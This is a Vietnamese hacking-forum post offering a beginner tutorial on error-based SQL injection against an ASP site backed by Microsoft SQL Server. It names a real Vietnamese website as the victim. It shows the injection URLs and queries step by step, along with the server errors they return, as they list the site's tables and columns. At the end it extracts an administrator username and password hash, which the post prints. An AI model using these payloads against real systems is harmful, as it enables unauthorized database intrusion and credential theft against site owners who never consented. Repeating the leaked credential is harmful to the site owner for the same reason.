ASP SQL Injection

Discussion in 'Web Application Security & Hacking' started by Mickey, Dec 9, 2017.

  1. Mickey

    Mickey Hacking For Hacker Staff Member

    viết tiếp cái TUT thứ 2 cho newbie,pro đừng chém nha,chỉ mong pro bình chọn em live qua ngày 19 tháng 5
    là ok rồi :JFBQ00125061225b:

    VicTim: http://viengiamdinhphapytamthantu.com.vn/chitiet.asp?id=28
    check: http://viengiamdinhphapytamthantu.com.vn/chitiet.asp?id=28'
    Microsoft OLE DB Provider for SQL Server error '80040e14'Unclosed quotation mark after the character string ''.
    /inc-chitiettin.asp, line 13
    bắt đầu nào
    http://viengiamdinhphapytamthantu.c...from information_schema.tables))--sp_password
    Microsoft OLE DB Provider for SQL Server error '80040e07'Conversion failed when converting the nvarchar value 'tbchitietsp' to data type int.
    /inc-chitiettin.asp, line 13
    http://viengiamdinhphapytamthantu.c...ble_name not in('tbchitietsp')))--sp_password
    Microsoft OLE DB Provider for SQL Server error '80040e07'Conversion failed when converting the nvarchar value 'tbcohoikd' to data type int.
    /inc-chitiettin.asp, line 13
    bây giờ ta tiếp tục dùng câu lệnh sau để get toàn bộ table
    and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('tbchitietsp','tbcohoidk')))--sp_password
    sau khi ta xác định được table cần get ta sẽ get column của table đó
    ở đây mình get table tbnhanvien
    ok,múc thôi
    http://viengiamdinhphapytamthantu.c... where table_name='tbnhanvien'))--sp_password
    câu lệnh truy vấn là:
    and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbnhanvien'))--sp_password
    Microsoft OLE DB Provider for SQL Server error '80040e07'Conversion failed when converting the nvarchar value 'id' to data type int.
    /inc-chitiettin.asp, line 13
    tiếp tục nào
    http://viengiamdinhphapytamthantu.com.vn/chitiet.asp?id=28%20%20and%201=convert%28int,%28select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=%27tbnhanvien%27%20and%20column_name%20not%20in%28%27id%27%29%29%29--sp_password
    Microsoft OLE DB Provider for SQL Server error '80040e07'Conversion failed when converting the nvarchar value 'mathanhvien' to data type int.
    /inc-chitiettin.asp, line 13
    [TABLE="width: 98%"]
    [/TABLE]
    [TABLE="width: 98%"]
    [/TABLE]
    Xem thêm...
    http://viengiamdinhphapytamthantu.c...ame not in('id','mathanhvien')))--sp_password

    Microsoft OLE DB Provider for SQL Server error '80040e07'Conversion failed when converting the nvarchar value 'manv' to data type int.
    /inc-chitiettin.asp, line 13
    [TABLE="width: 98%"]
    [/TABLE]
    http://viengiamdinhphapytamthantu.c... in('id','mathanhvien','manv')))--sp_password
    Microsoft OLE DB Provider for SQL Server error '80040e07'Conversion failed when converting the nvarchar value 'pass' to data type int.
    /inc-chitiettin.asp, line 13
    [TABLE="width: 98%"]
    [/TABLE]
    ok,chỉ cần những cái này thôi : manv vs pass

    http://viengiamdinhphapytamthantu.c...ect top 1 manv from tbnhanvien))--sp_password
    Microsoft OLE DB Provider for SQL Server error '80040e07'Conversion failed when converting the nvarchar value '1admin701' to data type int.
    /inc-chitiettin.asp, line 13
    http://viengiamdinhphapytamthantu.c...ect top 1 pass from tbnhanvien))--sp_password

    Microsoft OLE DB Provider for SQL Server error '80040e07'Conversion failed when converting the nvarchar value 'ad9296e30a9835236e32bda0039753dd1280495f49f65473204c14f532fb3299' to data type int.
    /inc-chitiettin.asp, line 13
    Ngon cơm rồi:
    1admin701 : ad9296e30a9835236e32bda0039753dd1280495f49f65473204c14f532fb3299
    :JFBQ00125061225b:
     

Share This Page